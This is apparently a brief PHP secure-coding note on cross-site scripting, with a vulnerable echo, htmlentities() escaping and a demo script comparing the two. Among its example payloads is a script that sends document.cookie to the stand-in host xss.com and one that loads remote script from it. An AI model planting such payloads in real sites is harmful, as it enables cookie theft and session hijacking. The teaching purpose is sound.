Definition: http://en.wikipedia.org/wiki/Cross-site_scripting
XSS Cheat Sheet: http://ha.ckers.org/xss.html#XSScalc
XSS exists when tainted (user-controlled) data is written into an HTML context without being escaped for that context.
Example:
<?php echo $_POST['name']; ?>
Examples of XSS exploits:
<script>alert('xss')</script>
<script>new Image().src='http://xss.com/xss.php?cookies='+encodeURI(document.cookie)</script>
<script src="http://xss.com/xss.js"></script>
Protection:
– Validate the input
– Escape the input / output
<?php echo htmlentities($_POST['name'], ENT_QUOTES, 'UTF-8'); ?>
– Bind the session cookie to the client IP that created the session, so a stolen cookie presented from another IP is not accepted
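The following is an added example, not code from the original note: the unescaped echo beside the htmlentities() version, run over a benign name and the payloads listed above, in both HTML text and attribute context. Input is constructed inline instead of being read from $_POST so it runs offline; the function names are my own.

```php
<?php
// Vulnerable: tainted data enters the HTML text context unescaped.
function render_unsafe(string $name): string {
    return '<p>Hello, ' . $name . '</p>';
}

// Hardened: htmlentities() with ENT_QUOTES turns <, >, &, " and ' into
// entities, so the value can only be read as text, never as markup.
function render_safe(string $name): string {
    return '<p>Hello, ' . htmlentities($name, ENT_QUOTES, 'UTF-8') . '</p>';
}

// Attribute context: without ENT_QUOTES a single quote would survive and
// could close a single-quoted attribute; with it the value stays inert.
function render_attr_safe(string $name): string {
    return "<input name='who' value='"
        . htmlentities($name, ENT_QUOTES, 'UTF-8') . "'>";
}

// Constructed sample inputs: a legitimate name and the payloads from the note.
$samples = [
    "O'Brien",
    "<script>alert('xss')</script>",
    '<script src="http://xss.com/xss.js"></script>',
    "' onfocus='alert(1)",   // constructed: breaks out of a single-quoted attribute
];

foreach ($samples as $input) {
    echo "input:     " . $input . "\n";
    echo "unsafe:    " . render_unsafe($input) . "\n";
    echo "safe:      " . render_safe($input) . "\n";
    echo "attr safe: " . render_attr_safe($input) . "\n\n";
}
```

htmlentities() is the right tool only for HTML text and quoted attribute values; data placed inside a JavaScript block, a URL or a CSS value needs that context's own encoding.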